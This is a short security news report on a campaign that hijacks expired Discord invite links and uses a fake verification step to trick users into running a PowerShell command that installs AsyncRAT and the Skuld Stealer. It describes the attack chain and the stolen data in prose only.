13.06.2025
2 min
578
Cybercriminals exploit a vulnerability in Discord’s invitation system to lure victims to malicious servers. Under the guise of account verification, they force users to manually run PowerShell commands that install the AsyncRAT malware and Skuld Stealer, a powerful info stealer targeting crypto wallets.
The essence of the attack is to hijack expired or deleted Discord invite links that users previously considered trustworthy. Attackers restore such links via the custom vanity URL feature and redirect victims to their servers.
After joining the server, users are prompted to “verify” by clicking the Verify button. At this point, the ClickFix mechanism is triggered: a JavaScript script copies a malicious PowerShell command to the clipboard and asks to paste it manually into Windows Run. As a result, a script from Pastebin is downloaded and executed, which additionally loads the malicious AsyncRAT and Skuld Stealer.
Skuld steals:
* seed phrases and passwords from Exodus and Atomic Wallet,
* credentials from Discord, browsers, and gaming platforms,
* cryptocurrency wallets via wallet injection — replacing the original application files with Trojan versions from GitHub.
This is not the first time Discord has been used as an attack infrastructure. Through its CDN and bot systems, attackers regularly distribute malware without violating any platform policies.
Attackers combine social engineering, multi-stage downloaders, and PowerShell scripts to bypass protections, mislead victims, and infect systems. The attack is perfectly disguised as normal Discord activity, leveraging the trust in public invite links.
